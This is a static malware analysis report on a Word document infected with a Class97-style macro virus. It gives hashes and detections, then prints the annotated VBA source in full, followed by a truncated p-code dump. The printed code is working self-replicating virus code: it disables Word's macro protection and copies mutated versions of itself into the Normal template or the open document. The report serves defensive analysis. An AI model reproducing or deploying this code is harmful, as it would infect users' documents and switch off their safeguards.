Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1319dc90b65fe828…

MALICIOUS

Office (OLE)

28.5 KB Created: 1999-08-29 06:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 15609af90e89b4985ea88d60762d5371 SHA-1: 172c1321bc7ed4a4494cef87124bf01f38be5127 SHA-256: 1319dc90b65fe82878d08f338862ad1e171a099ad08a18dff918a7457de0f680
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document with a high-confidence detection for VBA macros and a critical ClamAV detection. The embedded VBA module (carved as 'macros.bas'; the module itself is named ThisDocument) is obfuscated and attempts to execute code upon document opening. The script's intent appears to be downloading and executing a second-stage payload, though the exact mechanism is obscured by the obfuscation. Note, however, that the extracted source below contains no URL, network or shell call: what is visible is a document_open handler that sets Options.VirusProtection to 0, resets the file attributes of the Normal template, and writes a case-mutated copy of its own code (with random comment bytes appended) into the first VBComponent of NormalTemplate or ActiveDocument through the VBProject object model — Class97-style self-replication rather than a downloader. The "second-stage download" reading should be treated as unconfirmed unless dynamic analysis shows otherwise.

Heuristics 3

  • ClamAV: Doc.Trojan.Liar-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Liar-5
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7991 bytes
SHA-256: 896a202a7b21de8f1ff801ed1049a9ef75df8ccf93f3eb78f3bf99ccbbdaa208
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header of the carved ThisDocument stream. VB_Base and
' VB_TemplateDerived appear to be the standard header for a Word document's
' ThisDocument class derived from Normal.dot; nothing here is suspicious by
' itself — the behaviour of interest is in document_open below.
' --- Analyst annotation (describes what the visible code does) ---
' Auto-executing handler: Word runs document_open when the document is opened
' (cf. the OLE_VBA_DOCOPEN heuristic above). Every statement line below ends in
' a bare apostrophe; the copy loop further down relies on that marker to split
' code from comment when it reproduces itself.
Private Sub document_open() '
' v() buffers the mutated copy of each source line (151 slots, 0..150).
' Rnd * 0 is always 0, so this sets Options.VirusProtection to False, i.e.
' switches off Word's macro virus protection prompt.
Dim v(150): Options.VirusProtection = (Rnd * 0) '
' Resets the Normal template file's attributes to vbNormal (clears read-only /
' hidden flags), presumably so the later s.Save can write to it.
SetAttr NormalTemplate.FullName, vbNormal '
' Source of the copy: the first VBComponent of the project containing this
' macro (MacroContainer), i.e. this module. s/nh default to the Normal
' template as the infection target; t is Chr(39), the apostrophe.
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
Set nh = s.VBProject.VBComponents(1).CodeModule '
' vx: 55-75 random bytes in the range Chr(156)..Chr(255), used as junk
' comment text so every generated copy differs (polymorphism, not encryption).
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
' Header line of the copy. Running from a document, the target is Normal and
' the copy is installed as document_close; when already running from Normal the
' If block below switches the target to ActiveDocument and names it
' document_open.
vc = "Private Sub document_close()" & t & vx & vbCr  '
If MacroContainer = NormalTemplate Then '
Set s = ActiveDocument: Set nh = s.VBProject.VBComponents(1).CodeModule '
vc = "Private Sub document_open()" & t & vx & vbCr '
End If: lin = abc.countoflines '
' Copy every line after the header (line 1 is replaced by the vc header above),
' mutating letter case and appending fresh junk comments. v() has only 151
' slots, so a source module longer than that would fail here at runtime.
For i = 2 To lin '
' d: 1-in-3 chance (d = 2) of an extra junk comment line; p: apostrophe
' position in the current source line.
jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '
' A line without an apostrophe ends the copy (the marker doubles as terminator).
If p = 0 Then GoTo e_ '
' Pure comment lines (apostrophe at column 1) are skipped once the module has
' grown past 100 lines — presumably to keep the junk from accumulating.
If p = 1 And lin > 100 Then '
d = 1: GoTo n_ '
End If '
' Code part of the line, upper-cased; each letter B..Y (Asc 66..89) is then
' flipped to lower case with probability 1/2 (adding 32). VBA is
' case-insensitive, so the copy still runs; only the byte pattern changes.
l = UCase(Left(abc.Lines(i, 1), (p - 1))) '
For o = 1 To Len(l) '
f = Mid(l, o, 1) '
If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '
v(i) = v(i) & f '
Next o '
' New random comment tail for this line, same byte range as vx.
For j = 1 To Int(75 - (Rnd * 20))  '
jc = jc & Chr(255 - Int(Rnd * 100)) '
Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
e_: '
' Infection step: only writes into the target module when it has fewer than
' two lines (i.e. not already infected), then saves the target (Normal.dot or
' the active document). A macro writing into another document's VBProject is
' the behaviour to alert on here.
If nh.countoflines < (1 + 1) Then '
nh.addfromstring vc: s.Save '
End If '
' Payload: on days 25-30 of the month, inserts the text "l0 julie, wassup?"
' after the current selection. Otherwise the macro is silent.
If Day(Now()) = (25 + Int(Rnd * 6)) Then Selection.InsertAfter "l0 julie, wassup?" '
End Sub '
Rem Class97Macro.julie - dedicated to julie ;) '
Rem Another virus by jack twoflower [LineZero & Metaphase] '

' Processing file: /opt/analyzer/scan_staging/cae8c65388474ed9be298f43513fd49f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3979 bytes
' Line #0:
' 	FuncDefn (Private Sub document_open())
' 	QuoteRem 0x001C 0x0000 ""
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0096 
' 	VarDefn v
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x0030 0x0000 ""
' Line #2:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	Ld vbNormal 
' 	ArgsCall SetAttr 0x0002 
' 	QuoteRem 0x002A 0x0000 ""
' Line #3:
' 	SetStmt 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	Set a 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld a 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set ab 
' 	QuoteRem 0x003D 0x0000 ""
' Line #4:
' 	SetStmt 
' 	Ld ab 
' 	MemLd CodeModule 
' 	Set abc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set s 
' 	BoS 0x0000 
' 	LitDI2 0x0027 
' 	ArgsLd Chr 0x0001 
' 	St t 
' 	QuoteRem 0x003D 0x0000 ""
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0030 0x0000 ""
' Line #6:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x004B 
' 	Ld Rnd 
' 	LitDI2 0x0014 
' 	Mul 
' 	Paren 
' 	Sub 
' 	FnInt 
' 	For 
' 	BoS 0x0000 
' 	Ld vx 
' 	LitDI2 0x00FF 
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St vx 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	NextVar 
' 	QuoteRem 0x004F 0x0000 ""
' Line #7:
' 	LitStr 0x001C "Private Sub document_close()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x0035 0x0000 ""
' Line #8:
' 	Ld MacroContainer 
' 	Ld NormalTemplate 
' 	Eq 
' 	IfBlock 
' 	QuoteRem 0x0028 0x0000 ""
' Line #9:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set s 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0048 0x0000 ""
' Line #10:
' 	LitStr 0x001B "Private Sub document_open()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x0033 0x0000 ""
' Line #11:
' 	EndIfBlock 
' 	BoS 0x0000 
' 	Ld abc 
' 	MemLd countoflin
... (truncated)